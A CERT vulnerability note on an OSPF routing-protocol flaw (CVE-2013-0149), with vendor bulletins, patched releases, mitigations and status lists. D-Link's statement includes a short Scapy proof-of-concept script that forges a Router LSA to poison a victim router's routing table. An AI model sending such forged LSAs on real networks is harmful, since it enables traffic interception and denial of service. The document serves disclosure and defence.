Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers

2013-08-02T00:00:00
ID VU:229804
Type cert
Reporter CERT
Modified 2013-12-06T18:59:00

Description

Overview

The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack.

Description

CWE-694: Use of Multiple Resources with a Duplicate Identifier

The OSPF protocol requires LSA's to be identified by: LS Type, Advertising Router, and Link State ID. However, during the routing table calculation phase, the specification states that a LSA is queried in the LSA database
using only the Link State ID. Since the Link State ID is used in the LSA database to identify a particular router, a malformed duplicate entry can cause unexpected and insecure implementation-specific behavior.

In some implementations, the vulnerability can allow an attacker to subvert the routing table of victim router by sending false link state advertisements on behalf of other routers. This subversion can cause the victim router
to drop the entire table (denial of service) or to re-route traffic on the network.


Impact

This vulnerability can allow an attacker to re-route traffic, compromising the confidentiality of the data, or to conduct a denial-of-service attack against a router, dropping all traffic.


Solution

Install Updates
The OSPF protocol is a popular interior routing protocol that is used by many devices and manufacturers. This vulnerability is implementation-specific, so some vendors may not be affected. The list below contains known affected or non-affected vendors. Please consult your network equipment vendor to confirm how they are affected by this vulnerability.


Vendor Information

229804

Filter by status: All Affected Not Affected Unknown

Filter by content: __ Additional information available

__ Sort by: Status Alphabetical

Expand all

Javascript is disabled. Click here to view vendors.

Brocade __ Affected

Notified: June 13, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN

July 25, 2013

TSB 2013-165- A SEVERITY: Low – Informational

PRODUCTS AFFECTE D:
Brocade MLX Series running NetIron SW
Brocade NetIron XMR Series running NetIron SW
Brocade NetIron CER Series running NetIron SW
Brocade NetIron CES Series running NetIron SW
Brocade VDX Series running Network OS 3.x and later SW
Brocade FastIron Series running FastIron SW
Brocade ICX Series running FastIron SW
Brocade TurboIron Series running FastIron or TurboIron SW
Brocade BigIron RX Series running BigIron RX SW
Brocade ADX Series and JetCore Series running ServerIron SW
Brocade Vyatta vRouter
CORRECTED IN RELEASE:
See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as
CVE-2013-0149. See <http://nvd.nist.gov/home.cfm> for details.

Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that
have a direct, entitled, support relationship in place with Brocade

Please contact your primary service provider for further information regarding this topic and
applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already
has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing
tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc.
The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1); where the link state
ID & router ID in the LSA is not same; leading to corruption of routing table in the routers.
The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a
legitimate OSPF peer. OR the router LSA is sent in the interface where an OSPF peer is existing
already.

WORKAROUND
There is no workaround. However if users can physically secure their network/routers, the chance of
this attack is quite low.
The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections, (i.e. leaf
interfaces).
c) Enable OSPF MD5 authentication
This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See <http://My.Brocade.com> for the appropriate SW release(s) as listed below, please contact your
account team or Brocade Support if you have further questions.

Affected Products:
 Brocade MLX Series
 Brocade NetIron XMR Series
 Brocade NetIron CER Series
 Brocade NetIron CES Series

SW Releases with problem resolved
 NetIron 05.2.00k and later
 NetIron 05.3.00f and later
 NetIron 05.4.00e and later
 NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
 Brocade VDX Series

SW Releases with problem resolved
 Network OS 3.0.1c and later
 Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
 Brocade FastIron Series
 Brocade ICX Series
 Brocade TurboIron Series

SW Releases with problem resolved
 FastIron 7.2.02k and later
 FastIron 7.3.00g and later
 FastIron 07.4.00d and later
 FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
 Brocade BigIron RX Series

SW Releases with problem resolved
 BigIron RX 2.7.02p and later
 BigIron RX 02.8.00f and later
 BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
 Brocade ADX Series and JetCore Series

SW Releases with problem resolved
 ServerIron JetCore 10.2.02d
 ServerIron JetCore 11.0.00k
 ServerIron ADX 12.3.01k
 ServerIron ADX 12.4.00k
 ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
 Brocade Vyatta vRouter

For customers running on Amazon Web
Services this problem has been resolved.
SW Releases with problem resolved
 Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Check Point Software Technologies Affected

Notified: May 28, 2013 Updated: October 16, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Cisco Systems, Inc. __ Affected

Notified: May 22, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

Cisco has provided patches for this vulnerability, please check the URL below for details.

Vendor References

  • <http://tools.cisco.com/security/center/viewAlert.x?alertId=30210>

D-Link Systems, Inc. __ Affected

Notified: May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

1.Advisory Information

Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
D-Link ID: DLINK-2013-VUL0213
Advisory URL: TBD prior to Aug. 1, 2013
Date published: August 1, 2013
Date of last update: 7/29/13 (will update on saving document)
Reported by: CERT
Release mode: Coordinated Release

2.Vulnerability Information
Class: CWE-694
Impact: Critical
Remotely Exploitable: Possible, but would require access via other product (s)
Locally Exploitable: Yes
CVE Name: CVE-2013-0149
3.Vulnerability Description
The Open Shortest Path First (OSPF) protocol does not specify unique Link State
Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or
conduct a Denial of Service (DoS) attack.

This vulnerability can allow an attacker to re-route traffic through their own router,
compromising the confidentiality of the data, or to conduct a Denial of Service attack
against a router, dropping all traffic.

4.Vulnerable Packages
The following is the list of known affected devices and the associated firmware
(confirmed by D-Link). This will be updated as needed if additional units effected.
1. DES-3810-28 – R2.20.B017 (HW Not available in the US)

5.VendorInformation, Solutions and Workarounds
D-Link distributes a number of devices which could potentially be affected by this
vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of
being subject to this attack.

D-Link is working to reduce the potential impact of this vulnerability, which is a result of
an ambiguous standard. Currently we advise the following:

As always, adhering to best practices will be the strongest defense against attacks. As
long as your physical devices, networks, and protocols are secured, it will be very
difficult for an attacker to insert a rogue LSA to initiate this type of attack.

First, this vulnerability does not defeat cryptographic (MD5) authentication, we
recommend a strong MD5 authentication key as your best defense.
We also recommend that administrators enable the OSPF passive interface feature to
stop sending or receiving routing table updates on interfaces that do not participate in
OSPF.

Finally, we recommend that networks use MAC-based Access Control (MAC) to
authenticate devices before they are able to communicate with the network. The MAC
feature is a client-less design so there is no need to install extra software on a user’s
computer, and ensures that only devices on a whitelist will have access to the network.
When used in conjunction with common security best practices, it can help to strongly
limit the possible vectors of attack.

D-Link is monitoring the situation for an update to the standard that can be implemented
to protect potentially affected devices.

6.Credits
Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
The publication of this advisory was not coordinated with forementioned

7.Technical Description / Proof of Concept Code

7.1.OSPF 𠇏ight Back” is triggered by LSAs with matching Router ID only, and so can
be evaded by using non matching Router ID and Link State ID on a rogue LSA. Routing
lookup uses only the Link State ID field, and so may, depending on implementation,
result in selecting the rogue LSA before the valid LSA.

scappy proof of concept attack script

attacker_source_ip = "192.168.13.1"
attacker_router_id = "192.168.18.1"
victim_destination_ip = "192.168.13.3"
victim_router_id = "192.168.37.3"
false_adv_router = "192.168.27.11"
seq_num = 0x80000004L
R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
/OSPF_Hdr(src=attacker_router_id) \
/OSPF_LSUpd(lsalist=[ \
OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router,
seq=seq_num, linklist=[ \
OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1), \
OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1), \
OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3) \
])
])
send(R3_FALSE_LSA, iface="eth0")

8.ReportTimeline
• May 28, 2013 – Notification by Cert of the issue
• May 28, 2013 – Notify Qualified D-Link Resources of issue
• June 6, 2013 – Cert notified embargo date changed to July 30
• Jun 6, 2013 – D-Link Request Cert to resend details
• June 11, 2013 – D-Link receives details
• July 29, 2013 – Cert notified embargo date changed to Aug 1
• July 29, 2013 – D-Link Sends Vulnerability Response Report to Cert
• July 30, 2013 – D-Link Post Report for effected Products

9.References
[1] CVE-229804-2013.pdf – Owning the Routing Table Part II

10.AboutD-Link
D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise
environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link
implements and supports unified network solutions that integrate capabilities in switching, wireless,
broadband, storage, IP Surveillance, and cloud-based network management. For more information visit
www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter
(www.twitter.com/dlink).

11.Disclaimer
D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its
subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners.
Copyright © 2013. D-Link. All Rights Reserved.

References

Authors:
Patrick Cline - Patrick.Cline@dlink.com
William Brown – William.Brown@dlink.com

Vendor Information

Please see DLINK-2013-VUL0213.

Enterasys Networks __ Affected

Notified: May 28, 2013 Updated: August 19, 2013

Status

Affected

Vendor Statement

Product Advisory Note - https://cp-enterasys.kb.net/article.aspx?article=15134&p=1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Extreme Networks __ Affected

Notified: May 28, 2013 Updated: July 30, 2013

Status

Affected

Vendor Statement

Extreme networks' EXOS implementation of OSPF is susceptible to the vulnerability reported in VU#229804.

This vulnerability will be fixed in future EXOS release.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM Corporation __ Affected

Notified: May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

IBM has provided updates for multiple products, please check the URLs below for details.

Vendor References

  • <http://www-912.ibm.com/systems/electronic/support/s_dir/slkbase.nsf/docNumber/677961906>
  • <http://www-01.ibm.com/support/docview.wss?uid=isg3T1019716>

Juniper Networks, Inc. __ Affected

Notified: May 10, 2013 Updated: December 03, 2013

Status

Affected

Vendor Statement

LEGACY ADVISORY ID:

PSN-2013-08-987

PRODUCT AFFECTED:
All Juniper Networks platforms running Junos Operating System software, JunosE Operating System software, and ScreenOS software

PROBLEM:
A vulnerability has been discovered in the OSPF (Open Shortest Path First) protocol that allows a remote attacker to insert, update, or delete routes in the OSPF database. Juniper has worked to provide fixes for all supported code that is vulnerable to this issue.

The issue lies in the OSPF protocol (RFC 2328: <http://www.rfc-editor.org/rfc/rfc2328.txt>). OSPF does not specify that the 'Link State ID' and 'Advertising Router' fields need to match when a router receives an OSPF link-state advertisement (LSA). This limitation of the protocol specification would allow for an attacker to inject false routes into the OSPF database. This issue doesn't exist if the OSPF configuration of a router is set to use MD5 Authentication, or if a filter is used to block external parties from sending OSPF link-state update (LSU) packets. This issue also does not apply to passive OSPF interfaces or interfaces that are not configured for OSPF.

This issue was discovered by an external security researcher.

No other Juniper Networks products or platforms are affected by this issue.

This issue has been assigned CVE-2013-0149.

SOLUTION:
Releases containing (or will contain) the fix specifically include: 13.1R3, 13.2X50-D10, 12.3R3, 12.2R5, 12.1R7, 12.1X45-D10, 12.1X44-D15, 11.4R8, 10.4R15, and all subsequent releases. In addition, all Junos OS software releases built on or after 2013-07-25 will also have fixed this specific issue.

Customers can confirm the build date of any Junos OS release by issuing the command 'show version detail'.

All JunosE software releases built on or after 2013-07-25 have fixed this specific issue. Please contact JTAC to request a patch or hotfix for fixes on all other supported releases of code.

Software updates to ScreenOS have been released to resolve this issue. Releases containing the fix include ScreenOS 5.4.0r28a, 6.2.0r17a, and 6.3.0r14a.

This issue is being tracked as PR 878639 (Junos), CQ95773 (JunosE), and PR 895456 (ScreenOS).

KB16765 - "In which releases are vulnerabilities fixed?" describes which release vulnerabilities are fixed as per our End of Engineering and End of Life support policies.

WORKAROUND:
Juniper recommends that customers use MD5 authentication when configuring OSPF. MD5 authentication completely mitigates this issue as the router will not accept an LSA without the correct MD5 auth value.

It is good security practice to limit the exploitable attack surface of critical infrastructure networking equipment. Use access lists or firewall filters on physical interfaces (not loopback) to limit access to the router via OSPF unless necessary.

Customers can request a hotfix for this issue on JunosE may do so by contacting JTAC.
IMPLEMENTATION:

RELATED LINKS:
KB16613: Overview of the Juniper Networks SIRT Monthly Security Bulletin Publication Process
KB16765: In which releases are vulnerabilities fixed?
KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories.
Report a Vulnerability - How to Contact the Juniper Networks Security Incident Response Team
CVE-2013-0149

CVSS SCORE:
7.8 (AV:N/AC:M/Au:N/C:N/I:P/A:C)

RISK LEVEL:
High

RISK ASSESSMENT:
This issue could allow an remote attacker the ability to modify an OSPF database. For the issue to take place the attacker would need to have unfiltered access to an OSPF interface that is not using MD5 authentication. The attacker would be able to add routes, overwrite routes, and also clear the OSPF database. This attack could potentially allow an attacker to cause a denial of service or reroute traffic.

ACKNOWLEDGEMENTS:
Juniper SIRT would like to acknowledge and thank Gabi Nakibly for responsibly reporting this vulnerability to CERT/CC who coordinated the multi-vendor response.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

NEC Corporation __ Affected

Notified: May 28, 2013 Updated: September 10, 2013

Status

Affected

Vendor Statement

We provide information on this issue at the following URL: <http://jpn.nec.com/security-info/secinfo/nv13-006.html> (only in Japanese)

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

  • <http://jpn.nec.com/security-info/secinfo/nv13-006.html>

Oracle Corporation __ Affected

Notified: May 28, 2013 Updated: October 16, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

Affected products include: Oracle Sun Blade 6000 10GBE switched NEM 1.2, Sun Network 10GBE Switch 72P 1.2, Oracle Switch ES1-24 1.3. A patch is available at the following link.

Vendor References

  • <http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html>

Vyatta __ Affected

Notified: May 10, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN

July 25, 2013

TSB 2013-165- A SEVERITY: Low – Informational

PRODUCTS AFFECTED:
Brocade MLX Series running NetIron SW
Brocade NetIron XMR Series running NetIron SW
Brocade NetIron CER Series running NetIron SW
Brocade NetIron CES Series running NetIron SW
Brocade VDX Series running Network OS 3.x and later SW
Brocade FastIron Series running FastIron SW
Brocade ICX Series running FastIron SW
Brocade TurboIron Series running FastIron or TurboIron SW
Brocade BigIron RX Series running BigIron RX SW
Brocade ADX Series and JetCore Series running ServerIron SW
Brocade Vyatta vRouter
CORRECTED IN RELEASE:
See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as
CVE-2013-0149. See <http://nvd.nist.gov/home.cfm> for details.

Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that
have a direct, entitled, support relationship in place with Brocade

Please contact your primary service provider for further information regarding this topic and
applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already
has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing
tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc.
The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1); where the link state
ID & router ID in the LSA is not same; leading to corruption of routing table in the routers.
The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a
legitimate OSPF peer. OR the router LSA is sent in the interface where an OSPF peer is existing
already.

WORKAROUND
There is no workaround. However if users can physically secure their network/routers, the chance of
this attack is quite low.
The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections, (i.e. leaf
interfaces).
c) Enable OSPF MD5 authentication
This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See <http://My.Brocade.com> for the appropriate SW release(s) as listed below, please contact your
account team or Brocade Support if you have further questions.

Affected Products:
 Brocade MLX Series
 Brocade NetIron XMR Series
 Brocade NetIron CER Series
 Brocade NetIron CES Series

SW Releases with problem resolved
 NetIron 05.2.00k and later
 NetIron 05.3.00f and later
 NetIron 05.4.00e and later
 NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
 Brocade VDX Series

SW Releases with problem resolved
 Network OS 3.0.1c and later
 Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
 Brocade FastIron Series
 Brocade ICX Series
 Brocade TurboIron Series

SW Releases with problem resolved
 FastIron 7.2.02k and later
 FastIron 7.3.00g and later
 FastIron 07.4.00d and later
 FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
 Brocade BigIron RX Series

SW Releases with problem resolved
 BigIron RX 2.7.02p and later
 BigIron RX 02.8.00f and later
 BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
 Brocade ADX Series and JetCore Series

SW Releases with problem resolved
 ServerIron JetCore 10.2.02d
 ServerIron JetCore 11.0.00k
 ServerIron ADX 12.3.01k
 ServerIron ADX 12.4.00k
 ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
 Brocade Vyatta vRouter

For customers running on Amazon Web
Services this problem has been resolved.
SW Releases with problem resolved
 Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Yamaha Corporation __ Affected

Notified: May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

Yamaha corporation provides information on this issue at the following URL. (Japanese only)

<http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU96465452.html>

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

  • <http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU96465452.html>

ACME Packet Not Affected

Notified: May 28, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Buffalo Inc Not Affected

Notified: May 30, 2013 Updated: September 12, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Fortinet, Inc. Not Affected

Notified: May 28, 2013 Updated: August 19, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

FreeBSD Project Not Affected

Notified: May 28, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Global Technology Associates, Inc. __ Not Affected

Notified: May 28, 2013 Updated: July 30, 2013

Statement Date: July 30, 2013

Status

Not Affected

Vendor Statement

GTA's GB-OS based firewalls are not affected by this (VU#229804
- OSPF) vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Hitachi __ Not Affected

Notified: May 28, 2013 Updated: July 31, 2013

Status

Not Affected

Vendor Statement

`Hitachi Information for VU#229804

AlaxalA AX series
(AX8600R/AX6000S/AX3800S/AX3600S/AX2500S/AX2200S/AX1200S/AX7800S/AX7800R)
are not vulnerable to this issue.`

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Huawei Technologies __ Not Affected

Notified: May 10, 2013 Updated: August 22, 2013

Status

Not Affected

Vendor Statement

Huawei network devices are not affected by this (VU#229804- OSPF)
vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Intel Corporation Not Affected

Notified: May 22, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

McAfee Not Affected

Notified: May 28, 2013 Updated: October 16, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Palo Alto Networks Not Affected

Notified: May 28, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Quagga __ Not Affected

Notified: May 23, 2013 Updated: August 05, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Quagga is not affected by this vulnerability but the vendor has provided a patch to prevent rebroadcasting of malformed LSAs.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

VMware Not Affected

Notified: May 28, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Watchguard Technologies, Inc. Not Affected

Notified: May 28, 2013 Updated: August 06, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

eSoft, Inc. Not Affected

Notified: May 28, 2013 Updated: July 30, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

ACCESS Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

AT&T Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Alcatel-Lucent Unknown

Notified: May 10, 2013 Updated: May 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Apple Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Avaya, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Barracuda Networks Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Belkin, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Blue Coat Systems Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Borderware Technologies Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

CA Technologies Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Charlotte's Web Networks Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Computer Emergency Response Team Australia Unknown

Notified: May 30, 2013 Updated: May 30, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Conectiva Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Cray Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Debian GNU/Linux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Dell Computer Corporation, Inc. Unknown

Notified: May 10, 2013 Updated: May 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

DragonFly BSD Project Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

EMC Corporation Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Engarde Secure Linux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Ericsson Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

F5 Networks, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Fedora Project Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Force10 Networks, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Fujitsu Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Gentoo Linux Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Google Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Hewlett-Packard Company Unknown

Notified: May 10, 2013 Updated: May 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

IBM Corporation (zseries) Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

IBM eServer Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

IP Infusion, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Infoblox Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Internet Security Systems, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Intoto Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Mandriva S. A. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Mellanox Technologies Unknown

Notified: July 10, 2013 Updated: July 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Microsoft Corporation Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

MontaVista Software, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

NetApp Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

NetBSD Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Nokia Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Nortel Networks, Inc. Unknown

Notified: May 10, 2013 Updated: May 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Novell, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

OpenBSD Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Openwall GNU/*/Linux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Peplink Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Process Software Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Q1 Labs Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

QLogic Unknown

Notified: July 17, 2013 Updated: July 17, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

QNX Software Systems Inc. Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Red Hat, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

SUSE Linux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

SafeNet Unknown

